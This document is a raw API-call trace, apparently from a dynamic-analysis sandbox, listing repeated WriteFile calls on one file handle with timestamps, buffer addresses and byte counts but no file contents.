	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x26d242d*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d242d*, lpNumberOfBytesWritten=0x129420*=0x19, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x26d2448*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2448*, lpNumberOfBytesWritten=0x129420*=0x2e, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x26d2478*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2478*, lpNumberOfBytesWritten=0x129420*=0x49, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x26d24c3*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d24c3*, lpNumberOfBytesWritten=0x129420*=0x1a, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x26d24df*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d24df*, lpNumberOfBytesWritten=0x129420*=0x2c, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x26d250d*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d250d*, lpNumberOfBytesWritten=0x129420*=0x51, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x26d2560*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2560*, lpNumberOfBytesWritten=0x129420*=0x33, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x26d2595*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2595*, lpNumberOfBytesWritten=0x129420*=0x2a, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x26d25c1*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d25c1*, lpNumberOfBytesWritten=0x129420*=0x30, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x26d25f3*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d25f3*, lpNumberOfBytesWritten=0x129420*=0x2b, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x26d2620*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2620*, lpNumberOfBytesWritten=0x129420*=0x50, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x26d2672*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2672*, lpNumberOfBytesWritten=0x129420*=0xc, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x26d2680*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2680*, lpNumberOfBytesWritten=0x129420*=0x29, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x26d26ab*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d26ab*, lpNumberOfBytesWritten=0x129420*=0x50, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x26d26fd*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d26fd*, lpNumberOfBytesWritten=0x129420*=0x44, lpOverlapped=0x0) returned 1
	[0206.298] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x26d2743*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2743*, lpNumberOfBytesWritten=0x129420*=0x24, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x26d2769*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2769*, lpNumberOfBytesWritten=0x129420*=0x2e, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x26d2799*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2799*, lpNumberOfBytesWritten=0x129420*=0x3e, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x26d27d9*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d27d9*, lpNumberOfBytesWritten=0x129420*=0x45, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x26d2820*, nNumberOfBytesToWrite=0x1f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2820*, lpNumberOfBytesWritten=0x129420*=0x1f, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x26d2841*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2841*, lpNumberOfBytesWritten=0x129420*=0x17, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x26d285a*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d285a*, lpNumberOfBytesWritten=0x129420*=0x1d, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.299] WriteFile (in: hFile=0x534, lpBuffer=0x26d2879*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2879*, lpNumberOfBytesWritten=0x129420*=0x2a, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x26d28a5*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d28a5*, lpNumberOfBytesWritten=0x129420*=0x28, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x26d28cf*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d28cf*, lpNumberOfBytesWritten=0x129420*=0x4a, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x26d291b*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d291b*, lpNumberOfBytesWritten=0x129420*=0x46, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x26d2963*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2963*, lpNumberOfBytesWritten=0x129420*=0x46, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x26d29ab*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d29ab*, lpNumberOfBytesWritten=0x129420*=0x11, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x26d29be*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d29be*, lpNumberOfBytesWritten=0x129420*=0x56, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x26d2a16*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2a16*, lpNumberOfBytesWritten=0x129420*=0xe, lpOverlapped=0x0) returned 1
	[0206.300] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x26d2a26*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2a26*, lpNumberOfBytesWritten=0x129420*=0x13, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x26d2a3b*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2a3b*, lpNumberOfBytesWritten=0x129420*=0x3a, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x26d2a77*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2a77*, lpNumberOfBytesWritten=0x129420*=0x23, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x26d2a9c*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2a9c*, lpNumberOfBytesWritten=0x129420*=0x4c, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x26d2aea*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2aea*, lpNumberOfBytesWritten=0x129420*=0x36, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x26d2b22*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2b22*, lpNumberOfBytesWritten=0x129420*=0x2a, lpOverlapped=0x0) returned 1
	[0206.301] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x26d2b4e*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2b4e*, lpNumberOfBytesWritten=0x129420*=0x3f, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x26d2b8f*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2b8f*, lpNumberOfBytesWritten=0x129420*=0x55, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x26d2be6*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2be6*, lpNumberOfBytesWritten=0x129420*=0x3f, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x26d2c27*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2c27*, lpNumberOfBytesWritten=0x129420*=0x31, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x26d2c5a*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2c5a*, lpNumberOfBytesWritten=0x129420*=0x3d, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x26d2c99*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2c99*, lpNumberOfBytesWritten=0x129420*=0x44, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x26d2cdf*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2cdf*, lpNumberOfBytesWritten=0x129420*=0x4e, lpOverlapped=0x0) returned 1
	[0206.302] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x26d2d2f*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2d2f*, lpNumberOfBytesWritten=0x129420*=0x17, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x26d2d48*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2d48*, lpNumberOfBytesWritten=0x129420*=0x51, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x26d2d9b*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2d9b*, lpNumberOfBytesWritten=0x129420*=0x3e, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x26d2ddb*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2ddb*, lpNumberOfBytesWritten=0x129420*=0x37, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x26d2e14*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2e14*, lpNumberOfBytesWritten=0x129420*=0x43, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x26d2e59*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2e59*, lpNumberOfBytesWritten=0x129420*=0x33, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x26d2e8e*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2e8e*, lpNumberOfBytesWritten=0x129420*=0x23, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.303] WriteFile (in: hFile=0x534, lpBuffer=0x26d2eb3*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2eb3*, lpNumberOfBytesWritten=0x129420*=0x48, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.304] WriteFile (in: hFile=0x534, lpBuffer=0x26d2efd*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2efd*, lpNumberOfBytesWritten=0x129420*=0x1d, lpOverlapped=0x0) returned 1
